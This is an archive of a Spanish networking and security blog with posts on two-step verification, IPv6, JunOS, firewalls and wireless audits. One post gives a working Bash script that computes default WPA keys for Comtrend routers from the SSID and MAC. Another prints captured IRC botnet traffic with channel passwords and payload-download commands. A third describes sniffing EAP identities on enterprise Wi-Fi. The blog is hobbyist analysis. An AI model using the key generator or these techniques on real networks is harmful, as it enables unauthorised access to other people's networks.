B1 Labs

Algo que tienes, algo que sabes

2011-10-08T23:49:00.000+02:00

Robo de identidad, fuga de información, espionaje industrial y cyberchantaje son algunos de los principales delitos que ocurren día a día en la red de redes.

¿Quien no ha sufrido (o conoce a alguien) una pérdida de acceso a, por ejemplo, una de sus cuentas de correo? ¿Recuerdan ese sudo frío al no poder entrar? No es agradable, pero tampoco es nada comparable a lo que puede venir después.

El correo electrónico ha pasado a ser nuestro repositorio central de identidad. Nuestro buzón de correo (o, mejor dicho, el acceso a él) es la llave a toda nuestra información. Siendo esto así ¿porqué no lo protegemos mejor?

Si eres usuario de GMail, me complace informarte que desde Julio de este año está disponible la verificación de dos pasos para poder acceder a tu cuenta de Google.

¿Qué es y como funciona?

La verificación de dos pasos basa su fortaleza en la necesidad de que el usuario aporte información de dos fuentes diferentes.

La primera fuente es tu propia memoria, algo que sabes: Una contraseña. La segunda fuente es en este caso tu móvil, algo que tienes: Un código que te muestra tu móvil. Google te envía un SMS con el código al móvil cada vez que introduces bien la contraseña en tu cuenta, pero si tienes un SmartPhone (Android, iOS, Blackberry) existe una aplicación que genera un código cada minuto.

Las ventajas de activar la verificación de dos pasos son evidentes: Seguridad, seguridad y seguridad. ¿Qué pasa si alguien adivina tu contraseña de Google? Si tienes activada la verificación de dos pasos ¡nada! ¡no podrán entrar en tu cuenta! ¿Qué pasas si alguien te roba el móvil? ¡nada! ¡sin tu contraseña (que NO tienes apuntada en el móvil ¿no?) no pueden entrar! También existe una manera de recuperar acceso a tu cuenta aunque no tengas el código del minuto.

Las desventajas también existen, pero deberías ser consciente del increíble aumento de seguridad que supone activar la verificación de dos pasos. En este caso el uso de aplicaciones de terceros con tu cuenta de Google se complica. Es necesario crear contraseñas específicas por aplicación y revocarlas cuando ya no las vayamos a utilizar. El sistema ni siquiera te deja escoger la contraseña, creando una difícil de recordar. Esto es así para que forzar al usuario a continuar usando la verificación en dos pasos y que la puerta trasera que suponen las contraseñas específicas no sea especialmente amplia...

Finalmente creo que lo mejor es que vayais vosotros mismos a revisar la ayuda de Google referente a la verificación de dos pasos.

Marco de trabajo para una plácida transición a IPv6

2011-06-14T11:57:00.001+02:00

Después del aparente éxito del día mundial de IPv6, son muchos los administradores de redes corporativas que han aumentado su interés sobre el nuevo protocolo. Esto es obviamente muy bueno, pero la parte mala empieza cuando vamos leyendo sobre IPv6 y se nos dibuja un futuro de coexistencia de protocolos, dolores de cabeza para juntar las piezas del puzle, miedo a perder el control de nuestra red y muchísimo miedo a no entender correctamente como funciona.

No es objetivo del artículo que enlazamos el ofrecer un tutorial para entender IPv6, pero sí creemos que será de mucha utilidad para trazar nuestros planes de migración a IPv6 y de coexistencia con IPv4. El artículo está escrito por Brian Heder y publicado en NetworkWorld:

IPv6 transition framework for the enterprise [ENG]

Más sobre IPv6

2011-03-15T22:28:00.002+01:00

Image via WikipediaDando tumbos por la red he llegado a la página de la empresa Consulintel, una empresa de Pozuelo de Alarcón al parecer muy al día en todo este jaleo de la finalización de entrega de las direcciones IPv4 y la puesta en marcha de IPv6. Son miembros fundadores del IPv6 Forum, además de delegados españoles.

Pero lo interesante, al fin y al cabo, es la información que nos puedan proporcionar y en este caso está muy bien. Disponen de un apartado de divulgación en el que podremos encontrar diversas publicaciones entre las que destacaría las dos últimas:

Si estáis interesados en IPv6 no dejéis de leerlas, como mínimo "IPv6 para todos".

En los comentarios Alex nos informa de una serie de artículos sobre IPv6 que están realizando en Iniqua:

· Hacking IPv6: Parte I en Iniqua

Aprendiendo IPv6 con Hurricane Electric

2011-03-13T17:04:00.002+01:00

Image via WikipediaParece que ya va llegando la hora, que IPv4 de verdad se agota y entre este año y el que viene nos vamos pegar una buena paliza migrando equipamiento.

Para seros sincero os diré que no soy ningún experto en IPv6, por lo que me tengo que poner a ello pero ya mismito. Para ello sin duda una gran opción es realizar la certificación de Hurricane Electric (http://ipv6.he.net/certification/), ya que es en su mayoría práctica y gratuita. Además, nos regalan un /48 para nosotros solitos :) y eso son ni más ni menos que 65536 redes /64, que a su vez son (cada red /64) 18.446.744.073.709.551.616 direcciones IPv6

RIPE IPv6 Chart

Dicha certificación no nos hará expertos, pero suficiente como para que nos empiece a sonar de qué va todo esto.

Es importante conocer bien como funcionará IPv6, no solo para que funcionen las comunicaciones si no por los retos en cuanto a seguridad que se nos presenta. Sin ir más lejos, el NAT ya no será necesario y es casi obligatorio que ICMP llegue de extremo a extremo (y no me refiero solo a los echo).

Personalmente ya estoy manos a la obra y espero que, cuando volvamos a este tema, sepamos todos un poquito más de ello.

El Gobierno Español subvencionará la transición a IPv6

2011-03-12T14:50:00.000+01:00

Image via WikipediaLo leo en El País y no puedo más que mostrarme escéptico.

¿Funcionará? ¿Qué criterios seguirán para asignar las subvenciones? ¿Será una pérdida de tiempo y dinero o, por el contrario, permitirá que saltemos con éxito la próxima brecha digital?

En el artículo (que no enlaza a ningún sitio, que huevos más gordos) se habla de priorización del tráfico IPv6 sobre IPv4 por parte de los proveedores de servicios, cosa que me suena a la manera que tendrán Telefónica y compañía de abrir la puerta a la muerte de la neutralidad en la red. Se empieza por priorizar IPv6 y, cuando te quieres dar cuenta, La Red tal como la conocemos hoy en día ha muerto.

Aún así está todo por ver y espero que salga bien.

Microsoft recomienda no usar IE6, no bromeo

2011-03-05T01:29:00.002+01:00

Image via WikipediaY con esta noticia acontece el fin de una era. ¿Ha dejado Microsoft de ser malvada? Apuestan por los estándares y la interoperabilidad ¿es fruto de su posición amenazada por los SmartPhones? (Mercado en el que por ahora se han quedado atrás)

Si no recuerdo mal es ya la tercera noticia sorprendente por parte de los chicos de Redmond. Las dos primeras fueron Kinect y WP7, dos casos en los que los pupilos de Bill Gates han dado la mano a la comunidad de hackers. Y ahora http://ie6countdown.com con la que guiña un ojo a los desarrolladores web, recordándonos a miles de curiosos -de paso- que están dando las últimas pinceladas a su Internet Explorer 9.

Personalmente me parece una buena jugada.

En dicha web se pueden encontrar datos de como decrece el uso de IE6 en el mundo. En España estamos ahora mismo en un 3%, no está mal.

RFC2324 - HTCPCP

2011-03-04T12:38:00.002+01:00

Image via WikipediaEl RFC2324 describe el protocolo HTCPTP/1.0 que son las siglas de "Hyper Text Coffee Pot Control Protocol".

Sí, has leído bien: Protocolo hipertextual para control de café. Mediante este protocolo es posible controlar cafeteras, aunque a día de hoy y después de 13 años de la publicación de este RFC no se conoce cafetera compatible con HTCPCP. ¿Quien dijo que los estándares se expandían rápidamente?

Hay extractos del RFC2324 divertidísimos:

Coffee pots heat water using electronic mechanisms, so there is no fire. Thus, no firewalls are necessary, and firewall control policy is irrelevant.

Any attempt to brew coffee with a teapot should result in the error code "418 I'm a teapot". The resulting entity body MAY be short and stout.

Como curiosidad, en el propio RFC2324 se habla de la primera máquina conectada y operada remotamente por Internet, dato documentado en el RFC2235: Una tostadora controlada por SNMP en 1990.

Juniper ¿simplifica? La arquitectura de red de CPD

2011-02-28T14:44:00.002+01:00

Juniper ha presentado su nueva tecnología QFabric (Whitepaper) que intentará desterrar a Ethernet en entornos de CPD.

La idea básica de QFabric es montar en un solo y gigantesco virtual chassis todos los recursos de almacenamiento de la infraestructura del CPD. La comunicación entre nodos dejará de ser Ethernet para pasar a utilizar el protocolo propietario de Juniper, por que parece que podemos ir despidiéndonos de esas largas horas de troubleshooting para pasar a largos días de espera para que nos responda su TAC.

Ya hablando en términos de rendimiento (prometido) nos colocamos en la nada despreciable cifra de 10 terabits. Pudiendo, siempre según el fabricante, dar servicio hasta 6000 servidores en una red plana, con una latencia de apenas 5ms. Sí que se utiliza Ethernet para la comunicación final con el nodo (sea almacenamiento o servidor).

Por lo que me parece, las mejoras de rendimiento serán mayormente aprovechables en entornos de computación distribuida. En otros casos creo que las desventajas (¿red plana?) superan con creces a las ventajas.

Básicamente y por resumir: Juniper ha anunciado un switch gigante.

Tip: Balanceo manual en IP Cluster de Checkpoint

2011-02-24T09:34:00.002+01:00

Este truco se le ocurrió a un buen amigo mío:

Para forzar el balanceo:

cphaprob -d conmuta -t 0 -s problem register

Para volver al estado inicial:
cphaprob -a unregister

De esta manera podemos forzar la basculación de un nodo al otro en cualquier momento.

El truco está en que forzamos al monitorización de un interfaz que no existe, por lo que el cluster balancea directamente al detectarlo como caído.

Por fin salió a la luz

2011-02-21T20:22:00.001+01:00

Image via WikipediaDespués de perder toda esperanza en que la gente de SeguridadWireless publicara el algoritmo de generación de contraseñas por defecto de Comtrend (redes WLAN_XXXX y Jazztel_XXXX en España), algún hacker con curiosidad publicó a principios de este mes todos los detalles del mismo.

Básicamente consiste en generar el hash md5 de una cadena compuesta de la siguiente manera:

La subcadena bcgbghgg más 12345678ABCD siendo los 8 primeros carácteres coincidentes con la dirección MAC del router y los 4 últimos carácteres coincidentes con los 4 carácteres finales del SSID de la red.

Así de fácil y rápido. Ni capturar tráfico ni generar diccionarios. Bueno, sí, generas un diccionario de una sola entrada :)

Como muestra de implementación, un script en Bash sacado de Forocoches:

#!/bin/bash

echo CalcWLAN by a.s.r

if [ $# -ne 2 ]
then
echo "Usage: $0 "
echo
echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
exit 1
fi

HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d :)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)

echo "La puta clave es $KEY"

JunOS: Cuatro humildes pinceladas

2009-10-17T19:00:00.001+02:00

Aprovechando que el otro día recibí formación de JunOS, me gustaría escribir aquí cuatro pinceladas de aquello tanto como anotación para mi mismo :-) como para todos vosotros.

Las configuraciones en JunOS son jerárquicas por lo que, por ejemplo, para asignar una IP a un interfaz deberíamos navegar al interfaz físico y de ahí al interfaz lógico. Como JunOS soporta diferentes protocolos de red (p.ej. y para no complicar digamos IPv4 e IPv6) también debemos entrar en el protocolo que queremos configurar (siempre dentro del interfaz, como hemos comentado) y allí ya podemos asignar la dirección IP. No es lo más cómodo del mundo pero si queremos jerarquía estricta es lo que toca.

Cuando hagamos login al equipo es posible que nos encontremos con uno de los dos siguientes prompts:

hostname% 

Ó

hostname>

En el primer caso nos encontramos realmente fuera del CLI, por lo que para entrar habrá que hacer:

hostname% cli

hostname> 

En el segundo caso ya estamos en CLI, pero en modo operacional. Si queremos configurar cualquier cosa deberemos entrar en el modo de configuración. Lógico ¿no? :-)

hostname> configure

hostname#

Una vez dentro del modo de configuración ya somos libres de toquetear todo lo que queramos. A continuación os describo alguno de los comandos válidos y más utilizados:

set: Asignar una configuración. El comando irá seguido de la configuración a modificar (p. ej. address para una IP) y el valor a asignar.

edit: El comando nos permitirá entrar en la parte de la jerarquía donde nos encontremos. Permite tanta profundidad como exista, por ejemplo podemos hacer edit security zones security-zones trust y estaremos dentro de la configuración de la zona trust.

show: Muestra la configuración. Si no estamos en la raíz de la jerarquía, nos mostrará la zona donde estemos.

up: Nos permite subir un nivel en la jerarquía.

top: Nos permite saltar a la raíz de la jerarquía.

Consigue un lector para el DNIe por 2€

2009-09-19T18:03:00.000+02:00

Tal como dice el título, ahora es posible conseguir un lector de tarjetas para el DNIe por tan solo 2€ (en concepto de gastos de envío). Es una campaña de Red.es y Tractis.

Para conseguirlo hay que ir al siguiente enlace: https://www.tractis.com/red-es/lectores

Más sobre botnets

2009-09-13T22:05:00.000+02:00

En el blog de Fortinet encontramos también una experiencia con botnets, controlada por IRC como es costumbre:

IRC bot lures social network users through IM

Robo de identificadores de usuario en redes WPA empresariales

2009-09-02T10:05:00.004+02:00

Este artículo es fruto de la experimentación y, como cualquier artículo de este blog, está totalmente sujeto a errores y da la bienvenida a correcciones y ampliaciones.

Durante una auditoria wireless me encontré con una red en principio bastante bastionada. SSID oculto, WPA+TKIP y PEAP-MsCHAPv2. Es decir:

· Comunicaciones cifradas (WPA+TKIP)

· Autenticación cifrada sobre TLS

La curiosidad del caso reside en como el RFC de EAP define la presentación de la identidad del usuario, previa a la autenticación y establecimiento del túnel SSL. Cito del RFC de EAP (3748), sección 5.1 (Identity) dice:

Identity Requests and Responses are sent in cleartext, so an attacker may snoop on the identity, or even modify or spoof identity exchanges. To address these threats, it is preferable for an EAP method to include an identity exchange that supports per-packet authentication, integrity and replay protection, and confidentiality.

Es decir, que utilices otro protocolo que pueda establecer comunicaciones seguras previas a la petición y respuesta de identidad, ya que en EAP se envía en claro.

No parece algo de lo que seamos muy conscientes, ya que todo aquel a quien se lo comento se sorprende (yo el primero, por supuesto).

Para conseguir esta identidad no hace falta estar conectado a la red ni lanzar ningún tipo de ataque, con esnifar tráfico en el aire nos vale. Lo que sí puede ser necesario es forzar de algún modo la reconexión de los clientes para capturar el dato. Un ataque de denegación de servicio a la capa física debería valer ¿no? Ignoro si existe algún ataque exitoso de desconexión de clientes para WPA que sea menos costoso que llenar de ruido el canal...

Añadido: Pues no está claro que lo que se esté usando sea PEAP-MsCHAPv2. Depende un poco de lo que se entienda por PEAP (si PEAPv0 ó PEAPv1). PEAP normalmente hace referencia a PEAPv0, pero no es ningún estándar ni mucho menos. Si tomamos ese PEAP como PEAPv0, resulta que PEAPv0 es EAP-MsCHAPv2, por lo que seguramente lo más correcto sería hablar de EAP-MsCHAPv2.

Conociendo una botnet

2009-09-01T23:47:00.001+02:00

Por motivos que no vienen a cuento, me encontré el otro día una máquina con un comportamiento no poco habitual pero sí algo sospechoso. Mantenía activa una conexión a un puerto curioso: 6567/TCP. Además no paraba de recibir datos desde esa conexión, así que me decidí a investigar.

Echándole un vistazo al tráfico encontrado vi que se trataba de una sesión IRC... Algo curiosa, como muestra un botón:

:[SI|ESP|00|P|48315]!XP-4508@E739FE49.33702750.F81114C2.IP QUIT :Broken pipe.
:[SI|ESP|00|MP|5597]!XP-2501@190.234.197.89 QUIT :Ping timeout.
:[SI|ESP|00|P|48364]!XP-1604@190.234.151.199 QUIT :Broken pipe.
:[SI|ESP|00|MP|4889]!XP-9956@190.42.201.38 JOIN :###J0rd4n-FUD###.
:[SI|ESP|00|P|95632]!XP-3988@190.81.172.124 QUIT :Broken pipe.
:[SI|PER|00|MP|2023]!XP-2923@190.40.161.71 JOIN :###J0rd4n-FUD###.
:[SI|ESP|00|MP|7718]!XP-9011@190.232.224.179 JOIN :###J0rd4n-FUD###.

Múltiples entradas y salidas al canal de IRC ###J0rd4n-FUD### así como una nomenclatura que seguía algún patrón para los clientes. De los 5 campos que hay entre corchetes, se puede entender que el segundo hace referencia al país (aunque consultando a donde pertenecen las direcciones IP no parece ser así) y el tercero unos flags sin identificar. Después aparece un cierre de exclamación y un identificador para el S.O. de la víctima (vi mayoría XP, algún Vista y un Win2K3 perdido...)

Maté la conexión por curiosidad y el proceso fue el siguiente:

1) Máquina víctima se conecta a una dirección web y se descarga un archivo hosts limpio, supuestamente para evitar protecciones que algunos anti-malware aplican modificando dicho archivo.

2) Máquina víctima conecta de nuevo al mismo servidor IRC y vemos algunos comandos aún más interesantes:

PASS pr1v4d0onl1n3r.

NICK [SI|ESP|00|MP|4973].

USER XP-7490 * 0 :NOMBRE.(NOMBRE podría ser el nombre de usuario en la máquina infectada)

MODE [SI|ESP|00|MP|4973] -ix.

JOIN ###J0rd4n-FUD### c1rc0s0leil.

PRIVMSG ###J0rd4n-FUD### :[p2p]: File injected to peer2peer folders..
PRIVMSG ###J0rd4n-FUD### :WinRAR Injection Activated.
PRIVMSG ###J0rd4n-FUD### :[Dl]: File download: 76.2KB to: c:\WINDOWS\windxds.exe @ 76.2KB/sec..
PRIVMSG ###J0rd4n-FUD### :[Dl]: Created process: "c:\WINDOWS\windxds.exe", PID: <3720>.

Recuperamos dos contraseñas que nos permiten entrar en el centro de control de la botnet (aunque como meros espectadores sin conocer comandos), además de descubrir el nombre del fichero y el nº de proceso que mantienen infectada la máquina.

En el canal de IRC encontramos colocado el siguiente topic:

19:35 -!- Topic for ###J0rd4n-FUD###: .p2p|.rar|.desfi http://xxxx.xxxx.com/hosts.exe c:\WINDOWS\windxds.exe 1
19:35 -!- Topic set by Botero [] [Wed Aug 19 18:45:35 2009]

La URL ha sido modificada por mi.

Las dos URLs citadas son diferentes máquinas, al parecer máquinas también víctimas en todo este turbio asunto.

Intenté buscar algo más de información (whois, dominios implicados, escaneos de puertos, ...) pero en principio no encontré nada especialmente relevante.

Dos apuntes en la misma línea pero aún más divertidos:

La gente de Cisco se encontró con algo similar y tuvo éxito al contactar con el botmaster: http://www.cisco.com/web/about/security/intelligence/bots.html

En S21Sec han mantenido una entrevista con el vampiro: http://blog.s21sec.com/2009/09/entrevista-con-el-vampiro.html

Must-read: Taller 802.11. Taller WiFi por Vic_Thor

2009-08-29T23:10:00.000+02:00

Ha publicado Vic_Thor una serie de interesantísimos artículos sobre 802.11 (WiFi) que considero personalmente de obligada lectura para todo aquel interesado en las redes inalámbricas.

El enlace es el siguiente: Taller 802.11 por Vic_Thor

FortiOS 4 MR1 lanzada

2009-08-29T18:43:00.003+02:00

Fortinet ha actualizado su sistema operativo propietario para appliances Fortigate, lanzando la versión 4 MR1 de FortiOS.

La lista de novedades es numerosa, destacando algunas:

· Almacenamiento de logs en SQL
· Cifrado y autentificación SNMPv3
· Mejoras en IPv6 (incluso soporte para enrutamiento dinámico)
· Mejoras en SSL-VPN

Como siempre, todos aquellos que tengáis usuario de la web de soporte de Fortinet podréis descargar esta y las anteriores versiones.

Para aquellos que os quedásteis en FortiOS 3, deciros que el salto ha sido muy grande en cuanto a posibilidades pero no demasiado en cuanto a utilización, por lo que un upgrade no será traumático a nivel "humano" y os aportará nuevas herramientas como el reconocimiento de aplicaciones (pudiendo aplicar bloqueos o excepciones en capa 7).

Os podría interesar: Documentación FortiGate

Hola mundo

2009-08-29T13:27:00.001+02:00

Este es el típico primer post de todo blog.

Un saludo al mundo ahí fuera.

B1 Labs

Algo que tienes, algo que sabes

Marco de trabajo para una plácida transición a IPv6

Más sobre IPv6

Aprendiendo IPv6 con Hurricane Electric

Related articles

El Gobierno Español subvencionará la transición a IPv6

Related articles

Microsoft recomienda no usar IE6, no bromeo

Related articles

RFC2324 - HTCPCP

Juniper ¿simplifica? La arquitectura de red de CPD

Related articles

Tip: Balanceo manual en IP Cluster de Checkpoint

Por fin salió a la luz

Related articles

JunOS: Cuatro humildes pinceladas

Consigue un lector para el DNIe por 2€

Más sobre botnets

Robo de identificadores de usuario en redes WPA empresariales

Conociendo una botnet

Must-read: Taller 802.11. Taller WiFi por Vic_Thor

FortiOS 4 MR1 lanzada

Hola mundo